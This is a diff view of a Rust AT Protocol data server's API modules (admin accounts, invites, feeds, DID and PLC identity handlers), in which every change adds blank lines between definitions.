··· 8 use serde::{Deserialize, Serialize}; 9 use serde_json::json; 10 use tracing::error; 11 + 12 #[derive(Deserialize)] 13 pub struct GetAccountInfoParams { 14 pub did: String, 15 } 16 + 17 #[derive(Serialize)] 18 #[serde(rename_all = "camelCase")] 19 pub struct AccountInfo { ··· 26 pub email_confirmed_at: Option<String>, 27 pub deactivated_at: Option<String>, 28 } 29 + 30 #[derive(Serialize)] 31 #[serde(rename_all = "camelCase")] 32 pub struct GetAccountInfosOutput { 33 pub infos: Vec<AccountInfo>, 34 } 35 + 36 pub async fn get_account_info( 37 State(state): State<AppState>, 38 headers: axum::http::HeaderMap, ··· 96 } 97 } 98 } 99 + 100 #[derive(Deserialize)] 101 pub struct GetAccountInfosParams { 102 pub dids: String, 103 } 104 + 105 pub async fn get_account_infos( 106 State(state): State<AppState>, 107 headers: axum::http::HeaderMap,
+1
src/api/admin/account/mod.rs
··· 3 mod info; 4 mod profile; 5 mod update; 6 pub use delete::{delete_account, DeleteAccountInput}; 7 pub use email::{send_email, SendEmailInput, SendEmailOutput}; 8 pub use info::{
··· 3 mod info; 4 mod profile; 5 mod update; 6 + 7 pub use delete::{delete_account, DeleteAccountInput}; 8 pub use email::{send_email, SendEmailInput, SendEmailOutput}; 9 pub use info::{
+6
src/api/admin/account/update.rs
··· 8 use serde::Deserialize; 9 use serde_json::json; 10 use tracing::error; 11 #[derive(Deserialize)] 12 pub struct UpdateAccountEmailInput { 13 pub account: String, 14 pub email: String, 15 } 16 pub async fn update_account_email( 17 State(state): State<AppState>, 18 headers: axum::http::HeaderMap, ··· 59 } 60 } 61 } 62 #[derive(Deserialize)] 63 pub struct UpdateAccountHandleInput { 64 pub did: String, 65 pub handle: String, 66 } 67 pub async fn update_account_handle( 68 State(state): State<AppState>, 69 headers: axum::http::HeaderMap, ··· 139 } 140 } 141 } 142 #[derive(Deserialize)] 143 pub struct UpdateAccountPasswordInput { 144 pub did: String, 145 pub password: String, 146 } 147 pub async fn update_account_password( 148 State(state): State<AppState>, 149 headers: axum::http::HeaderMap,
··· 8 use serde::Deserialize; 9 use serde_json::json; 10 use tracing::error; 11 + 12 #[derive(Deserialize)] 13 pub struct UpdateAccountEmailInput { 14 pub account: String, 15 pub email: String, 16 } 17 + 18 pub async fn update_account_email( 19 State(state): State<AppState>, 20 headers: axum::http::HeaderMap, ··· 61 } 62 } 63 } 64 + 65 #[derive(Deserialize)] 66 pub struct UpdateAccountHandleInput { 67 pub did: String, 68 pub handle: String, 69 } 70 + 71 pub async fn update_account_handle( 72 State(state): State<AppState>, 73 headers: axum::http::HeaderMap, ··· 143 } 144 } 145 } 146 + 147 #[derive(Deserialize)] 148 pub struct UpdateAccountPasswordInput { 149 pub did: String, 150 pub password: String, 151 } 152 + 153 pub async fn update_account_password( 154 State(state): State<AppState>, 155 headers: axum::http::HeaderMap,
+11
src/api/admin/invite.rs
··· 8 use serde::{Deserialize, Serialize}; 9 use serde_json::json; 10 use tracing::error; 11 #[derive(Deserialize)] 12 #[serde(rename_all = "camelCase")] 13 pub struct DisableInviteCodesInput { 14 pub codes: Option<Vec<String>>, 15 pub accounts: Option<Vec<String>>, 16 } 17 pub async fn disable_invite_codes( 18 State(state): State<AppState>, 19 headers: axum::http::HeaderMap, ··· 51 } 52 (StatusCode::OK, Json(json!({}))).into_response() 53 } 54 #[derive(Deserialize)] 55 pub struct GetInviteCodesParams { 56 pub sort: Option<String>, 57 pub limit: Option<i64>, 58 pub cursor: Option<String>, 59 } 60 #[derive(Serialize)] 61 #[serde(rename_all = "camelCase")] 62 pub struct InviteCodeInfo { ··· 68 pub created_at: String, 69 pub uses: Vec<InviteCodeUseInfo>, 70 } 71 #[derive(Serialize)] 72 #[serde(rename_all = "camelCase")] 73 pub struct InviteCodeUseInfo { 74 pub used_by: String, 75 pub used_at: String, 76 } 77 #[derive(Serialize)] 78 pub struct GetInviteCodesOutput { 79 pub cursor: Option<String>, 80 pub codes: Vec<InviteCodeInfo>, 81 } 82 pub async fn get_invite_codes( 83 State(state): State<AppState>, 84 headers: axum::http::HeaderMap, ··· 192 ) 193 .into_response() 194 } 195 #[derive(Deserialize)] 196 pub struct DisableAccountInvitesInput { 197 pub account: String, 198 } 199 pub async fn disable_account_invites( 200 State(state): State<AppState>, 201 headers: axum::http::HeaderMap, ··· 241 } 242 } 243 } 244 #[derive(Deserialize)] 245 pub struct EnableAccountInvitesInput { 246 pub account: String, 247 } 248 pub async fn enable_account_invites( 249 State(state): State<AppState>, 250 headers: axum::http::HeaderMap,
··· 8 use serde::{Deserialize, Serialize}; 9 use serde_json::json; 10 use tracing::error; 11 + 12 #[derive(Deserialize)] 13 #[serde(rename_all = "camelCase")] 14 pub struct DisableInviteCodesInput { 15 pub codes: Option<Vec<String>>, 16 pub accounts: Option<Vec<String>>, 17 } 18 + 19 pub async fn disable_invite_codes( 20 State(state): State<AppState>, 21 headers: axum::http::HeaderMap, ··· 53 } 54 (StatusCode::OK, Json(json!({}))).into_response() 55 } 56 + 57 #[derive(Deserialize)] 58 pub struct GetInviteCodesParams { 59 pub sort: Option<String>, 60 pub limit: Option<i64>, 61 pub cursor: Option<String>, 62 } 63 + 64 #[derive(Serialize)] 65 #[serde(rename_all = "camelCase")] 66 pub struct InviteCodeInfo { ··· 72 pub created_at: String, 73 pub uses: Vec<InviteCodeUseInfo>, 74 } 75 + 76 #[derive(Serialize)] 77 #[serde(rename_all = "camelCase")] 78 pub struct InviteCodeUseInfo { 79 pub used_by: String, 80 pub used_at: String, 81 } 82 + 83 #[derive(Serialize)] 84 pub struct GetInviteCodesOutput { 85 pub cursor: Option<String>, 86 pub codes: Vec<InviteCodeInfo>, 87 } 88 + 89 pub async fn get_invite_codes( 90 State(state): State<AppState>, 91 headers: axum::http::HeaderMap, ··· 199 ) 200 .into_response() 201 } 202 + 203 #[derive(Deserialize)] 204 pub struct DisableAccountInvitesInput { 205 pub account: String, 206 } 207 + 208 pub async fn disable_account_invites( 209 State(state): State<AppState>, 210 headers: axum::http::HeaderMap, ··· 250 } 251 } 252 } 253 + 254 #[derive(Deserialize)] 255 pub struct EnableAccountInvitesInput { 256 pub account: String, 257 } 258 + 259 pub async fn enable_account_invites( 260 State(state): State<AppState>, 261 headers: axum::http::HeaderMap,
+1
src/api/admin/mod.rs
··· 1 pub mod account; 2 pub mod invite; 3 pub mod status; 4 pub use account::{ 5 create_profile, create_record_admin, delete_account, get_account_info, get_account_infos, 6 send_email, update_account_email, update_account_handle, update_account_password,
··· 1 pub mod account; 2 pub mod invite; 3 pub mod status; 4 + 5 pub use account::{ 6 create_profile, create_record_admin, delete_account, get_account_info, get_account_infos, 7 send_email, update_account_email, update_account_handle, update_account_password,
+7
src/api/admin/status.rs
··· 8 use serde::{Deserialize, Serialize}; 9 use serde_json::json; 10 use tracing::{error, warn}; 11 #[derive(Deserialize)] 12 pub struct GetSubjectStatusParams { 13 pub did: Option<String>, 14 pub uri: Option<String>, 15 pub blob: Option<String>, 16 } 17 #[derive(Serialize)] 18 pub struct SubjectStatus { 19 pub subject: serde_json::Value, 20 pub takedown: Option<StatusAttr>, 21 pub deactivated: Option<StatusAttr>, 22 } 23 #[derive(Serialize)] 24 #[serde(rename_all = "camelCase")] 25 pub struct StatusAttr { 26 pub applied: bool, 27 pub r#ref: Option<String>, 28 } 29 pub async fn get_subject_status( 30 State(state): State<AppState>, 31 headers: axum::http::HeaderMap, ··· 184 ) 185 .into_response() 186 } 187 #[derive(Deserialize)] 188 #[serde(rename_all = "camelCase")] 189 pub struct UpdateSubjectStatusInput { ··· 191 pub takedown: Option<StatusAttrInput>, 192 pub deactivated: Option<StatusAttrInput>, 193 } 194 #[derive(Deserialize)] 195 pub struct StatusAttrInput { 196 pub apply: bool, 197 pub r#ref: Option<String>, 198 } 199 pub async fn update_subject_status( 200 State(state): State<AppState>, 201 headers: axum::http::HeaderMap,
··· 8 use serde::{Deserialize, Serialize}; 9 use serde_json::json; 10 use tracing::{error, warn}; 11 + 12 #[derive(Deserialize)] 13 pub struct GetSubjectStatusParams { 14 pub did: Option<String>, 15 pub uri: Option<String>, 16 pub blob: Option<String>, 17 } 18 + 19 #[derive(Serialize)] 20 pub struct SubjectStatus { 21 pub subject: serde_json::Value, 22 pub takedown: Option<StatusAttr>, 23 pub deactivated: Option<StatusAttr>, 24 } 25 + 26 #[derive(Serialize)] 27 #[serde(rename_all = "camelCase")] 28 pub struct StatusAttr { 29 pub applied: bool, 30 pub r#ref: Option<String>, 31 } 32 + 33 pub async fn get_subject_status( 34 State(state): State<AppState>, 35 headers: axum::http::HeaderMap, ··· 188 ) 189 .into_response() 190 } 191 + 192 #[derive(Deserialize)] 193 #[serde(rename_all = "camelCase")] 194 pub struct UpdateSubjectStatusInput { ··· 196 pub takedown: Option<StatusAttrInput>, 197 pub deactivated: Option<StatusAttrInput>, 198 } 199 + 200 #[derive(Deserialize)] 201 pub struct StatusAttrInput { 202 pub apply: bool, 203 pub r#ref: Option<String>, 204 } 205 + 206 pub async fn update_subject_status( 207 State(state): State<AppState>, 208 headers: axum::http::HeaderMap,
+7
src/api/error.rs
··· 4 response::{IntoResponse, Response}, 5 }; 6 use serde::Serialize; 7 #[derive(Debug, Serialize)] 8 struct ErrorBody { 9 error: &'static str, 10 #[serde(skip_serializing_if = "Option::is_none")] 11 message: Option<String>, 12 } 13 #[derive(Debug)] 14 pub enum ApiError { 15 InternalError, ··· 46 UpstreamUnavailable(String), 47 UpstreamError { status: u16, error: Option<String>, message: Option<String> }, 48 } 49 impl ApiError { 50 fn status_code(&self) -> StatusCode { 51 match self { ··· 144 Self::UpstreamError { status, error: None, message: None } 145 } 146 } 147 impl IntoResponse for ApiError { 148 fn into_response(self) -> Response { 149 let body = ErrorBody { ··· 153 (self.status_code(), Json(body)).into_response() 154 } 155 } 156 impl From<sqlx::Error> for ApiError { 157 fn from(e: sqlx::Error) -> Self { 158 tracing::error!("Database error: {:?}", e); 159 Self::DatabaseError 160 } 161 } 162 impl From<crate::auth::TokenValidationError> for ApiError { 163 fn from(e: crate::auth::TokenValidationError) -> Self { 164 match e { ··· 169 } 170 } 171 } 172 impl From<crate::util::DbLookupError> for ApiError { 173 fn from(e: crate::util::DbLookupError) -> Self { 174 match e {
··· 4 response::{IntoResponse, Response}, 5 }; 6 use serde::Serialize; 7 + 8 #[derive(Debug, Serialize)] 9 struct ErrorBody { 10 error: &'static str, 11 #[serde(skip_serializing_if = "Option::is_none")] 12 message: Option<String>, 13 } 14 + 15 #[derive(Debug)] 16 pub enum ApiError { 17 InternalError, ··· 48 UpstreamUnavailable(String), 49 UpstreamError { status: u16, error: Option<String>, message: Option<String> }, 50 } 51 + 52 impl ApiError { 53 fn status_code(&self) -> StatusCode { 54 match self { ··· 147 Self::UpstreamError { status, error: None, message: None } 148 } 149 } 150 + 151 impl IntoResponse for ApiError { 152 fn into_response(self) -> Response { 153 let body = ErrorBody { ··· 157 (self.status_code(), Json(body)).into_response() 158 } 159 } 160 + 161 impl From<sqlx::Error> for ApiError { 162 fn from(e: sqlx::Error) -> Self { 163 tracing::error!("Database error: {:?}", e); 164 Self::DatabaseError 165 } 166 } 167 + 168 impl From<crate::auth::TokenValidationError> for ApiError { 169 fn from(e: crate::auth::TokenValidationError) -> Self { 170 match e { ··· 175 } 176 } 177 } 178 + 179 impl From<crate::util::DbLookupError> for ApiError { 180 fn from(e: crate::util::DbLookupError) -> Self { 181 match e {
+3
src/api/feed/actor_likes.rs
··· 13 use serde_json::Value; 14 use std::collections::HashMap; 15 use tracing::warn; 16 #[derive(Deserialize)] 17 pub struct GetActorLikesParams { 18 pub actor: String, 19 pub limit: Option<u32>, 20 pub cursor: Option<String>, 21 } 22 fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) { 23 for like in likes { 24 let like_time = &like.indexed_at.to_rfc3339(); ··· 57 ); 58 } 59 } 60 pub async fn get_actor_likes( 61 State(state): State<AppState>, 62 headers: axum::http::HeaderMap,
··· 13 use serde_json::Value; 14 use std::collections::HashMap; 15 use tracing::warn; 16 + 17 #[derive(Deserialize)] 18 pub struct GetActorLikesParams { 19 pub actor: String, 20 pub limit: Option<u32>, 21 pub cursor: Option<String>, 22 } 23 + 24 fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) { 25 for like in likes { 26 let like_time = &like.indexed_at.to_rfc3339(); ··· 59 ); 60 } 61 } 62 + 63 pub async fn get_actor_likes( 64 State(state): State<AppState>, 65 headers: axum::http::HeaderMap,
+3
src/api/feed/author_feed.rs
··· 13 use serde::Deserialize; 14 use std::collections::HashMap; 15 use tracing::warn; 16 #[derive(Deserialize)] 17 pub struct GetAuthorFeedParams { 18 pub actor: String, ··· 22 #[serde(rename = "includePins")] 23 pub include_pins: Option<bool>, 24 } 25 fn update_author_profile_in_feed( 26 feed: &mut [FeedViewPost], 27 author_did: &str, ··· 35 } 36 } 37 } 38 pub async fn get_author_feed( 39 State(state): State<AppState>, 40 headers: axum::http::HeaderMap,
··· 13 use serde::Deserialize; 14 use std::collections::HashMap; 15 use tracing::warn; 16 + 17 #[derive(Deserialize)] 18 pub struct GetAuthorFeedParams { 19 pub actor: String, ··· 23 #[serde(rename = "includePins")] 24 pub include_pins: Option<bool>, 25 } 26 + 27 fn update_author_profile_in_feed( 28 feed: &mut [FeedViewPost], 29 author_did: &str, ··· 37 } 38 } 39 } 40 + 41 pub async fn get_author_feed( 42 State(state): State<AppState>, 43 headers: axum::http::HeaderMap,
+2
src/api/feed/custom_feed.rs
··· 11 use serde::Deserialize; 12 use std::collections::HashMap; 13 use tracing::{error, info}; 14 #[derive(Deserialize)] 15 pub struct GetFeedParams { 16 pub feed: String, 17 pub limit: Option<u32>, 18 pub cursor: Option<String>, 19 } 20 pub async fn get_feed( 21 State(state): State<AppState>, 22 headers: axum::http::HeaderMap,
··· 11 use serde::Deserialize; 12 use std::collections::HashMap; 13 use tracing::{error, info}; 14 + 15 #[derive(Deserialize)] 16 pub struct GetFeedParams { 17 pub feed: String, 18 pub limit: Option<u32>, 19 pub cursor: Option<String>, 20 } 21 + 22 pub async fn get_feed( 23 State(state): State<AppState>, 24 headers: axum::http::HeaderMap,
+1
src/api/feed/mod.rs
··· 3 mod custom_feed; 4 mod post_thread; 5 mod timeline; 6 pub use actor_likes::get_actor_likes; 7 pub use author_feed::get_author_feed; 8 pub use custom_feed::get_feed;
··· 3 mod custom_feed; 4 mod post_thread; 5 mod timeline; 6 + 7 pub use actor_likes::get_actor_likes; 8 pub use author_feed::get_author_feed; 9 pub use custom_feed::get_feed;
+10
src/api/feed/post_thread.rs
··· 13 use serde_json::{json, Value}; 14 use std::collections::HashMap; 15 use tracing::warn; 16 #[derive(Deserialize)] 17 pub struct GetPostThreadParams { 18 pub uri: String, ··· 20 #[serde(rename = "parentHeight")] 21 pub parent_height: Option<u32>, 22 } 23 #[derive(Debug, Clone, Serialize, Deserialize)] 24 #[serde(rename_all = "camelCase")] 25 pub struct ThreadViewPost { ··· 33 #[serde(flatten)] 34 pub extra: HashMap<String, Value>, 35 } 36 #[derive(Debug, Clone, Serialize, Deserialize)] 37 #[serde(untagged)] 38 pub enum ThreadNode { ··· 40 NotFound(ThreadNotFound), 41 Blocked(ThreadBlocked), 42 } 43 #[derive(Debug, Clone, Serialize, Deserialize)] 44 #[serde(rename_all = "camelCase")] 45 pub struct ThreadNotFound { ··· 48 pub uri: String, 49 pub not_found: bool, 50 } 51 #[derive(Debug, Clone, Serialize, Deserialize)] 52 #[serde(rename_all = "camelCase")] 53 pub struct ThreadBlocked { ··· 57 pub blocked: bool, 58 pub author: Value, 59 } 60 #[derive(Debug, Clone, Serialize, Deserialize)] 61 pub struct PostThreadOutput { 62 pub thread: ThreadNode, 63 #[serde(skip_serializing_if = "Option::is_none")] 64 pub threadgate: Option<Value>, 65 } 66 const MAX_THREAD_DEPTH: usize = 10; 67 fn add_replies_to_thread( 68 thread: &mut ThreadViewPost, 69 local_posts: &[RecordDescript<PostRecord>], ··· 111 } 112 } 113 } 114 pub async fn get_post_thread( 115 State(state): State<AppState>, 116 headers: axum::http::HeaderMap, ··· 190 let lag = get_local_lag(&local_records); 191 format_munged_response(thread_output, lag) 192 } 193 async fn handle_not_found( 194 state: &AppState, 195 uri: &str,
··· 13 use serde_json::{json, Value}; 14 use std::collections::HashMap; 15 use tracing::warn; 16 + 17 #[derive(Deserialize)] 18 pub struct GetPostThreadParams { 19 pub uri: String, ··· 21 #[serde(rename = "parentHeight")] 22 pub parent_height: Option<u32>, 23 } 24 + 25 #[derive(Debug, Clone, Serialize, Deserialize)] 26 #[serde(rename_all = "camelCase")] 27 pub struct ThreadViewPost { ··· 35 #[serde(flatten)] 36 pub extra: HashMap<String, Value>, 37 } 38 + 39 #[derive(Debug, Clone, Serialize, Deserialize)] 40 #[serde(untagged)] 41 pub enum ThreadNode { ··· 43 NotFound(ThreadNotFound), 44 Blocked(ThreadBlocked), 45 } 46 + 47 #[derive(Debug, Clone, Serialize, Deserialize)] 48 #[serde(rename_all = "camelCase")] 49 pub struct ThreadNotFound { ··· 52 pub uri: String, 53 pub not_found: bool, 54 } 55 + 56 #[derive(Debug, Clone, Serialize, Deserialize)] 57 #[serde(rename_all = "camelCase")] 58 pub struct ThreadBlocked { ··· 62 pub blocked: bool, 63 pub author: Value, 64 } 65 + 66 #[derive(Debug, Clone, Serialize, Deserialize)] 67 pub struct PostThreadOutput { 68 pub thread: ThreadNode, 69 #[serde(skip_serializing_if = "Option::is_none")] 70 pub threadgate: Option<Value>, 71 } 72 + 73 const MAX_THREAD_DEPTH: usize = 10; 74 + 75 fn add_replies_to_thread( 76 thread: &mut ThreadViewPost, 77 local_posts: &[RecordDescript<PostRecord>], ··· 119 } 120 } 121 } 122 + 123 pub async fn get_post_thread( 124 State(state): State<AppState>, 125 headers: axum::http::HeaderMap, ··· 199 let lag = get_local_lag(&local_records); 200 format_munged_response(thread_output, lag) 201 } 202 + 203 async fn handle_not_found( 204 state: &AppState, 205 uri: &str,
+4
src/api/feed/timeline.rs
··· 15 use serde_json::{json, Value}; 16 use std::collections::HashMap; 17 use tracing::warn; 18 #[derive(Deserialize)] 19 pub struct GetTimelineParams { 20 pub algorithm: Option<String>, 21 pub limit: Option<u32>, 22 pub cursor: Option<String>, 23 } 24 pub async fn get_timeline( 25 State(state): State<AppState>, 26 headers: axum::http::HeaderMap, ··· 56 } 57 get_timeline_local_only(&state, &auth_user.did).await 58 } 59 async fn get_timeline_with_appview( 60 state: &AppState, 61 headers: &axum::http::HeaderMap, ··· 123 let lag = get_local_lag(&local_records); 124 format_munged_response(feed_output, lag) 125 } 126 async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response { 127 let user_id: uuid::Uuid = match sqlx::query_scalar!( 128 "SELECT id FROM users WHERE did = $1",
··· 15 use serde_json::{json, Value}; 16 use std::collections::HashMap; 17 use tracing::warn; 18 + 19 #[derive(Deserialize)] 20 pub struct GetTimelineParams { 21 pub algorithm: Option<String>, 22 pub limit: Option<u32>, 23 pub cursor: Option<String>, 24 } 25 + 26 pub async fn get_timeline( 27 State(state): State<AppState>, 28 headers: axum::http::HeaderMap, ··· 58 } 59 get_timeline_local_only(&state, &auth_user.did).await 60 } 61 + 62 async fn get_timeline_with_appview( 63 state: &AppState, 64 headers: &axum::http::HeaderMap, ··· 126 let lag = get_local_lag(&local_records); 127 format_munged_response(feed_output, lag) 128 } 129 + 130 async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response { 131 let user_id: uuid::Uuid = match sqlx::query_scalar!( 132 "SELECT id FROM users WHERE did = $1",
+4
src/api/identity/account.rs
··· 16 use serde_json::json; 17 use std::sync::Arc; 18 use tracing::{error, info, warn}; 19 fn extract_client_ip(headers: &HeaderMap) -> String { 20 if let Some(forwarded) = headers.get("x-forwarded-for") { 21 if let Ok(value) = forwarded.to_str() { ··· 31 } 32 "unknown".to_string() 33 } 34 #[derive(Deserialize)] 35 #[serde(rename_all = "camelCase")] 36 pub struct CreateAccountInput { ··· 45 pub telegram_username: Option<String>, 46 pub signal_number: Option<String>, 47 } 48 #[derive(Serialize)] 49 #[serde(rename_all = "camelCase")] 50 pub struct CreateAccountOutput { ··· 53 pub verification_required: bool, 54 pub verification_channel: String, 55 } 56 pub async fn create_account( 57 State(state): State<AppState>, 58 headers: HeaderMap,
··· 16 use serde_json::json; 17 use std::sync::Arc; 18 use tracing::{error, info, warn}; 19 + 20 fn extract_client_ip(headers: &HeaderMap) -> String { 21 if let Some(forwarded) = headers.get("x-forwarded-for") { 22 if let Ok(value) = forwarded.to_str() { ··· 32 } 33 "unknown".to_string() 34 } 35 + 36 #[derive(Deserialize)] 37 #[serde(rename_all = "camelCase")] 38 pub struct CreateAccountInput { ··· 47 pub telegram_username: Option<String>, 48 pub signal_number: Option<String>, 49 } 50 + 51 #[derive(Serialize)] 52 #[serde(rename_all = "camelCase")] 53 pub struct CreateAccountOutput { ··· 56 pub verification_required: bool, 57 pub verification_channel: String, 58 } 59 + 60 pub async fn create_account( 61 State(state): State<AppState>, 62 headers: HeaderMap,
+14
src/api/identity/did.rs
··· 13 use serde::Deserialize; 14 use serde_json::json; 15 use tracing::{error, warn}; 16 #[derive(Deserialize)] 17 pub struct ResolveHandleParams { 18 pub handle: String, 19 } 20 pub async fn resolve_handle( 21 State(state): State<AppState>, 22 Query(params): Query<ResolveHandleParams>, ··· 63 } 64 } 65 } 66 pub fn get_jwk(key_bytes: &[u8]) -> Result<serde_json::Value, &'static str> { 67 let secret_key = SecretKey::from_slice(key_bytes).map_err(|_| "Invalid key length")?; 68 let public_key = secret_key.public_key(); ··· 78 "y": y_b64 79 })) 80 } 81 pub async fn well_known_did(State(_state): State<AppState>) -> impl IntoResponse { 82 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 83 // Kinda for local dev, encode hostname if it contains port ··· 96 }] 97 })) 98 } 99 pub async fn user_did_doc(State(state): State<AppState>, Path(handle): Path<String>) -> Response { 100 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 101 let user = sqlx::query!("SELECT id, did FROM users WHERE handle = $1", handle) ··· 174 }] 175 })).into_response() 176 } 177 pub async fn verify_did_web(did: &str, hostname: &str, handle: &str) -> Result<(), String> { 178 let expected_prefix = if hostname.contains(':') { 179 format!("did:web:{}", hostname.replace(':', "%3A")) ··· 242 } 243 } 244 } 245 #[derive(serde::Serialize)] 246 #[serde(rename_all = "camelCase")] 247 pub struct GetRecommendedDidCredentialsOutput { ··· 250 pub verification_methods: VerificationMethods, 251 pub services: Services, 252 } 253 #[derive(serde::Serialize)] 254 #[serde(rename_all = "camelCase")] 255 pub struct VerificationMethods { 256 pub atproto: String, 257 } 258 #[derive(serde::Serialize)] 259 #[serde(rename_all = "camelCase")] 260 pub struct Services { 261 pub atproto_pds: AtprotoPds, 262 } 263 #[derive(serde::Serialize)] 264 #[serde(rename_all = "camelCase")] 265 pub struct AtprotoPds { ··· 267 pub service_type: String, 268 pub endpoint: String, 269 } 270 pub async fn get_recommended_did_credentials( 271 State(state): State<AppState>, 272 headers: axum::http::HeaderMap, ··· 329 ) 330 .into_response() 331 } 332 #[derive(Deserialize)] 333 pub struct UpdateHandleInput { 334 pub handle: String, 335 } 336 pub async fn update_handle( 337 State(state): State<AppState>, 338 headers: axum::http::HeaderMap, ··· 410 } 411 } 412 } 413 pub async fn well_known_atproto_did( 414 State(state): State<AppState>, 415 headers: HeaderMap,
··· 13 use serde::Deserialize; 14 use serde_json::json; 15 use tracing::{error, warn}; 16 + 17 #[derive(Deserialize)] 18 pub struct ResolveHandleParams { 19 pub handle: String, 20 } 21 + 22 pub async fn resolve_handle( 23 State(state): State<AppState>, 24 Query(params): Query<ResolveHandleParams>, ··· 65 } 66 } 67 } 68 + 69 pub fn get_jwk(key_bytes: &[u8]) -> Result<serde_json::Value, &'static str> { 70 let secret_key = SecretKey::from_slice(key_bytes).map_err(|_| "Invalid key length")?; 71 let public_key = secret_key.public_key(); ··· 81 "y": y_b64 82 })) 83 } 84 + 85 pub async fn well_known_did(State(_state): State<AppState>) -> impl IntoResponse { 86 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 87 // Kinda for local dev, encode hostname if it contains port ··· 100 }] 101 })) 102 } 103 + 104 pub async fn user_did_doc(State(state): State<AppState>, Path(handle): Path<String>) -> Response { 105 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 106 let user = sqlx::query!("SELECT id, did FROM users WHERE handle = $1", handle) ··· 179 }] 180 })).into_response() 181 } 182 + 183 pub async fn verify_did_web(did: &str, hostname: &str, handle: &str) -> Result<(), String> { 184 let expected_prefix = if hostname.contains(':') { 185 format!("did:web:{}", hostname.replace(':', "%3A")) ··· 248 } 249 } 250 } 251 + 252 #[derive(serde::Serialize)] 253 #[serde(rename_all = "camelCase")] 254 pub struct GetRecommendedDidCredentialsOutput { ··· 257 pub verification_methods: VerificationMethods, 258 pub services: Services, 259 } 260 + 261 #[derive(serde::Serialize)] 262 #[serde(rename_all = "camelCase")] 263 pub struct VerificationMethods { 264 pub atproto: String, 265 } 266 + 267 #[derive(serde::Serialize)] 268 #[serde(rename_all = "camelCase")] 269 pub struct Services { 270 pub atproto_pds: AtprotoPds, 271 } 272 + 273 #[derive(serde::Serialize)] 274 #[serde(rename_all = "camelCase")] 275 pub struct AtprotoPds { ··· 277 pub service_type: String, 278 pub endpoint: String, 279 } 280 + 281 pub async fn get_recommended_did_credentials( 282 State(state): State<AppState>, 283 headers: axum::http::HeaderMap, ··· 340 ) 341 .into_response() 342 } 343 + 344 #[derive(Deserialize)] 345 pub struct UpdateHandleInput { 346 pub handle: String, 347 } 348 + 349 pub async fn update_handle( 350 State(state): State<AppState>, 351 headers: axum::http::HeaderMap, ··· 423 } 424 } 425 } 426 + 427 pub async fn well_known_atproto_did( 428 State(state): State<AppState>, 429 headers: HeaderMap,
+1
src/api/identity/mod.rs
··· 1 pub mod account; 2 pub mod did; 3 pub mod plc; 4 pub use account::create_account; 5 pub use did::{ 6 get_recommended_did_credentials, resolve_handle, update_handle, user_did_doc, well_known_did,
··· 1 pub mod account; 2 pub mod did; 3 pub mod plc; 4 + 5 pub use account::create_account; 6 pub use did::{ 7 get_recommended_did_credentials, resolve_handle, update_handle, user_did_doc, well_known_did,
+1
src/api/identity/plc/mod.rs
··· 1 mod request; 2 mod sign; 3 mod submit; 4 pub use request::request_plc_operation_signature; 5 pub use sign::{sign_plc_operation, ServiceInput, SignPlcOperationInput, SignPlcOperationOutput}; 6 pub use submit::{submit_plc_operation, SubmitPlcOperationInput};
··· 1 mod request; 2 mod sign; 3 mod submit; 4 + 5 pub use request::request_plc_operation_signature; 6 pub use sign::{sign_plc_operation, ServiceInput, SignPlcOperationInput, SignPlcOperationOutput}; 7 pub use submit::{submit_plc_operation, SubmitPlcOperationInput};
+2
src/api/identity/plc/request.rs
··· 9 use chrono::{Duration, Utc}; 10 use serde_json::json; 11 use tracing::{error, info, warn}; 12 fn generate_plc_token() -> String { 13 crate::util::generate_token_code() 14 } 15 pub async fn request_plc_operation_signature( 16 State(state): State<AppState>, 17 headers: axum::http::HeaderMap,
··· 9 use chrono::{Duration, Utc}; 10 use serde_json::json; 11 use tracing::{error, info, warn}; 12 + 13 fn generate_plc_token() -> String { 14 crate::util::generate_token_code() 15 } 16 + 17 pub async fn request_plc_operation_signature( 18 State(state): State<AppState>, 19 headers: axum::http::HeaderMap,
+4
src/api/identity/plc/sign.rs
··· 16 use serde_json::{json, Value}; 17 use std::collections::HashMap; 18 use tracing::{error, info, warn}; 19 #[derive(Debug, Deserialize)] 20 #[serde(rename_all = "camelCase")] 21 pub struct SignPlcOperationInput { ··· 25 pub verification_methods: Option<HashMap<String, String>>, 26 pub services: Option<HashMap<String, ServiceInput>>, 27 } 28 #[derive(Debug, Deserialize, Clone)] 29 pub struct ServiceInput { 30 #[serde(rename = "type")] 31 pub service_type: String, 32 pub endpoint: String, 33 } 34 #[derive(Debug, Serialize)] 35 pub struct SignPlcOperationOutput { 36 pub operation: Value, 37 } 38 pub async fn sign_plc_operation( 39 State(state): State<AppState>, 40 headers: axum::http::HeaderMap,
··· 16 use serde_json::{json, Value}; 17 use std::collections::HashMap; 18 use tracing::{error, info, warn}; 19 + 20 #[derive(Debug, Deserialize)] 21 #[serde(rename_all = "camelCase")] 22 pub struct SignPlcOperationInput { ··· 26 pub verification_methods: Option<HashMap<String, String>>, 27 pub services: Option<HashMap<String, ServiceInput>>, 28 } 29 + 30 #[derive(Debug, Deserialize, Clone)] 31 pub struct ServiceInput { 32 #[serde(rename = "type")] 33 pub service_type: String, 34 pub endpoint: String, 35 } 36 + 37 #[derive(Debug, Serialize)] 38 pub struct SignPlcOperationOutput { 39 pub operation: Value, 40 } 41 + 42 pub async fn sign_plc_operation( 43 State(state): State<AppState>, 44 headers: axum::http::HeaderMap,
+2
src/api/identity/plc/submit.rs
··· 12 use serde::Deserialize; 13 use serde_json::{json, Value}; 14 use tracing::{error, info, warn}; 15 #[derive(Debug, Deserialize)] 16 pub struct SubmitPlcOperationInput { 17 pub operation: Value, 18 } 19 pub async fn submit_plc_operation( 20 State(state): State<AppState>, 21 headers: axum::http::HeaderMap,
